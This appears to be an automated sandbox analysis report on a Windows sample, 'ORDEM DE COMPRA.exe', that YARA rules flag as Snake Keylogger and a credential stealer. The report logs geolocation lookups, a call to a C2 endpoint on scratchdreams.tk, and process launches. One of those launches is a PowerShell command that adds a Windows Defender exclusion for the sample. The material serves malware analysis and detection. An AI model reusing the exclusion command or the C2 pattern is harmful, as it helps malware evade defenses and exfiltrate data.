              1 | 192.168.2.6 | 49702 | 188.114.97.34 | 443 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-05-23 13:13:04 UTC | 61 | OUT | GET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              2024-05-23 13:13:05 UTC | 706 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:05 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15046
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QzeXNIPZ3fOFu4TYPP5uia%2FeAyoI1jqQW5DcOTiDCllalFaB6taIsNU7vjaPPGXe6HDKTOOvvwZ3P34Q4SQukIHG18p7OPn4zhQ%2BG%2BsnJvaHeIdvf7uFWRQMdiCZMzYXgNQg6qiX"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d1ea99f4271-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:05 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              2 | 192.168.2.6 | 49707 | 188.114.97.34 | 443 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-05-23 13:13:06 UTC | 61 | OUT | GET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              2024-05-23 13:13:06 UTC | 700 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:06 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15047
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wd1KOFe9ZXCdgV0QC74GtStDS1o8oEzkYlJjdURWO3MwL0BWWaVGt2t0ELFNL3sF760xVLXQ8EWC9vlAok6UCqeVbZXvXejGsNX0HFoFsw7dHQVdlqyQyBGdhq9eUoUPBPfyKvc7"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d2969ea0f83-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:06 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              3 | 192.168.2.6 | 49711 | 188.114.97.34 | 443 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-05-23 13:13:08 UTC | 61 | OUT | GET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              2024-05-23 13:13:08 UTC | 714 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:08 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15049
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WTq5v7U%2FGEGYmpRjdTunxF%2FOpkPyBRQ2E9LZGvzlfSryiT43IR4k%2FqFHYcvlJqe8zMSv1%2BIVupH%2B8VcK0AKssRd%2B5LrKY74zBIbuWDgFAmAUSq4aQ0fgJHpWNN2IfgC1Ej73hjp%2B"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d33b84bc47a-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:08 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              4 | 192.168.2.6 | 49713 | 188.114.97.34 | 443 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-05-23 13:13:09 UTC | 61 | OUT | GET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              2024-05-23 13:13:10 UTC | 708 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:10 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15051
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t7VTgAvQUDsax7TRh%2FuuU%2FfpdZFTg3MyOikxHAFqzNODcQ0v05iemFNaQC9WDAgi7L069JeIUhmQXoSxf7Cjwb9hXTIQUbX0nz%2FVUI2KEjbcxxuO1cUe3%2FXM4oYmFryoVMhuACfM"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d3dcc409dff-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:10 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              5 | 192.168.2.6 | 49715 | 188.114.97.34 | 443 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-05-23 13:13:11 UTC | 61 | OUT | GET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              2024-05-23 13:13:11 UTC | 716 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:11 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15052
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BNBs%2FBaSqctIFKHYXgAkWIbt6i%2Bh%2Bc7nU9F%2BoMsUBevpkdkljvrESAOOTIhcLwV0tCpA%2B6DCFNsv4KjW0j62xX8tlL%2B%2BRS31S7kSZoTXwLNjqO5lDDUAS0iHviYnWWRQSjg8GA5%2B"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d490ae2c3ee-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:11 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              6 | 192.168.2.6 | 49717 | 188.114.97.34 | 443 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-05-23 13:13:13 UTC | 85 | OUT | GET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              Connection: Keep-Alive
              2024-05-23 13:13:13 UTC | 712 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:13 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15054
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b8QuHdvy36hIFzaQcNyJ65nVcaMz%2FlDVqvsNJoZ6yKYU8pClQ0y8iAyVXwsTZc42bIj%2B2pV9re2n8oV7v%2BP%2FRmZJYBhr8w%2BvHP35ZpOCKTv%2FjjgKPw67P2rew741SwIaYFsp8F93"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d53ff6e0cdd-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:13 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              7 | 192.168.2.6 | 49720 | 188.114.97.34 | 443 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-05-23 13:13:15 UTC | 85 | OUT | GET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              Connection: Keep-Alive
              2024-05-23 13:13:15 UTC | 710 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:15 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15056
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wb9ml%2BLaMzNc6XPOvv%2FslWRLcKd3PGwsQ3VLe2%2B44i5P4%2BjDFD1vhocsJrWvlA6ZizjEpJTpf%2B1gayILVa1GLpUgVDskUB9u9trZe7vBG7NZM2nUo6bRnX2JvDb3hvD21ekUSH6M"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d6059a943a7-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:15 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              8 | 192.168.2.6 | 49722 | 188.114.97.34 | 443 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-05-23 13:13:16 UTC | 79 | OUT | GET /_send_.php?TS HTTP/1.1
              Host: scratchdreams.tk
              Connection: Keep-Alive
              2024-05-23 13:13:55 UTC | 743 | IN | HTTP/1.1 522
              Date: Thu, 23 May 2024 13:13:55 GMT
              Content-Type: text/plain; charset=UTF-8
              Content-Length: 15
              Connection: close
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8JHzL7kwg6N0Ow%2BB8Bn6I8%2BaneoAADiYq1iwmZo9QICMuU%2BHu4TsWbowIRRgnDFIihLpa7%2BxBNFaSW%2F4nzBCPJeDm3PTSyskBicT%2B%2BKNFa243f2lYdMY2qalgb8dzO6gANAo"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              X-Frame-Options: SAMEORIGIN
              Referrer-Policy: same-origin
              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
              Expires: Thu, 01 Jan 1970 00:00:01 GMT
              Server: cloudflare
              CF-RAY: 88854d66cb5f43bc-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:55 UTC | 15 | IN | Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
              Data Ascii: error code: 522



              Target ID:0
              Start time:09:12:55
              Start date:23/05/2024
              Path:C:\Users\user\Desktop\ORDEM DE COMPRA.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\ORDEM DE COMPRA.exe"
              Imagebase:0x1fbd7aa0000
              File size:528'393 bytes
              MD5 hash:46DAB257847EA9CFBBC77979323212C4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:2
              Start time:09:12:59
              Start date:23/05/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force
              Imagebase:0x7ff6e3d50000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:09:12:59
              Start date:23/05/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:09:13:00
              Start date:23/05/2024
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Wow64 process (32bit):
              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
              Imagebase:
              File size:45'984 bytes
              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:5
              Start time:09:13:00
              Start date:23/05/2024
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              Imagebase:0xd30000
              File size:43'008 bytes
              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Reputation:moderate
              Has exited:false

              Target ID:6
              Start time:09:13:00
              Start date:23/05/2024
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Wow64 process (32bit):
              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              Imagebase:
              File size:43'008 bytes
              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:false

              Target ID:9
              Start time:09:13:00
              Start date:23/05/2024
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 1756 -s 1120
              Imagebase:0x7ff794210000
              File size:570'736 bytes
              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: 7q$ 8q$ 9q$ :q$ [q$(7q$(8q$(9q$(:q$([q$07q$08q$09q$0:q$0[q$1N_I$87q$88q$89q$8:q$8[q$@7q$@8q$@9q$@:q$@[q$H7q$H8q$H9q$H:q$P7q$P8q$P9q$P:q$X7q$X8q$X9q$X:q$`7q$`8q$`9q$`:q$h7q$h8q$h9q$h:q$p7q$p8q$p9q$p:q$x6q$x6q$x6q$x6q$x6q$x6q$x7q$x8q$x9q$7q$7q$8q$8q$9q$9q$cy4
                • API String ID: 0-2972097800
                • Opcode ID: abc8cdcd24fa63d5621a3c060c0a7ab2b9e7a49c0e9453e70e9924118ed122e3
                • Instruction ID: b0a30c2fdf0dc98500b1c9f7ad2367697cb98f9c54ea202d38dc601e010da704
                • Opcode Fuzzy Hash: abc8cdcd24fa63d5621a3c060c0a7ab2b9e7a49c0e9453e70e9924118ed122e3
                • Instruction Fuzzy Hash: 23C2E230A1E7855FE35A9BB848A3699BBE0EF52360F1540BED44ECB1D3D99C080B8B55
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
